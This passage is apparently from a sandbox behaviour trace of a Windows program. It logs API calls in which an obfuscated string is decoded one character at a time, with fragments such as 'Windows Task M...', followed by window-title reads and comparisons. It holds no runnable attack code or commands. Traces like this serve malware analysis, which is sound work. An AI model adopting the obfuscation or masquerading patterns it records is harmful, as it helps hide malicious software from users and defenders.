| out: pvarResult=0x28f1c0) returned 0x0 [0201.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.426] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0201.427] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.427] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0201.427] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.428] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0201.428] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.429] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0201.429] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.430] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.430] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.434] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.434] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.435] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0201.435] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.435] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.436] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.436] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.437] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.437] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0201.437] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.438] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.438] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.439] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.439] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.440] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0201.440] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.441] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.441] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.442] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0201.442] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.442] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0201.443] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0201.443] GetForegroundWindow () returned 0x2035c [0201.443] GetLastError () returned 0x0 [0201.443] SysStringLen (param_1=" ") returned 0xff [0201.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0201.444] SysStringLen (param_1=" ") returned 0xff [0201.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0201.444] GetWindowTextA (in: hWnd=0x2035c, lpString=0x11644c4, nMaxCount=255 | out: lpString="Desktop") returned 7 [0201.444] GetLastError () returned 0x0 [0201.444] SysStringByteLen (bstr="敄歳潴p††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0201.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Desktop", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0201.444] SysStringByteLen (bstr="敄歳潴p††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0201.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Desktop", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Desktop") returned 256 [0201.445] SysStringLen (param_1="De") returned 0x2 [0201.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="De", cchWideChar=3, lpMultiByteStr=0x1150ca4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="De", lpUsedDefaultChar=0x0) returned 3 [0201.445] SetWindowTextA (hWnd=0x103c4, lpString="De") returned 1 [0201.445] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0201.446] GetFocus () returned 0x0 [0201.447] lstrlenA (lpString="De") returned 2 [0201.447] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0201.447] GetWindowTextA (in: hWnd=0x103c4, lpString=0x10ebcd0, nMaxCount=3 | out: lpString="Fo") returned 2 [0201.447] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0201.447] GetFocus () returned 0x0 [0201.447] lstrcmpA (lpString1="Fo", lpString2="De") returned 1 [0201.447] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0201.447] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x1150ca4) returned 0x1 [0201.449] IsWindow (hWnd=0x103c4) returned 1 [0201.449] IsWindow (hWnd=0x103c4) returned 1 [0201.450] IsWindow (hWnd=0x103c4) returned 1 [0201.450] IsWindow (hWnd=0x103c4) returned 1 [0201.450] GetFocus () returned 0x0 [0201.451] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0201.451] GetFocus () returned 0x0 [0201.451] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0201.451] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0201.451] GetFocus () returned 0x0 [0201.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="De", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0201.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="De", cbMultiByte=-1, lpWideCharStr=0x1150ca4, cchWideChar=3 | out: lpWideCharStr="De") returned 3 [0201.451] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0201.451] VarBstrCmp (bstrLeft="De", bstrRight="S ", lcid=0x0, dwFlags=0x30001) returned 0x0 [0201.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.453] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0201.453] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.454] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0201.454] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.455] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0201.455] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.455] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0201.456] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.456] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0201.457] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.457] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0201.458] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.458] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0201.458] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.459] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.459] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.460] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0201.460] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.461] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0201.510] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.511] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0201.511] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.512] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="k", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="k") returned 1 [0201.512] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.512] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.513] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.513] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0201.514] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.514] VarSub (in: 